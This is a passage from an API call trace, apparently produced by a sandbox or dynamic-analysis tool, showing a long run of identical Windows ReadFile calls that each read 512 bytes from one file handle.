nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, 
lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 
[0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, 
lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, 
lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: 
lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, 
lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.040] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.041] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.042] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.042] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, 
lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.043] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.044] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.045] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.048] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 
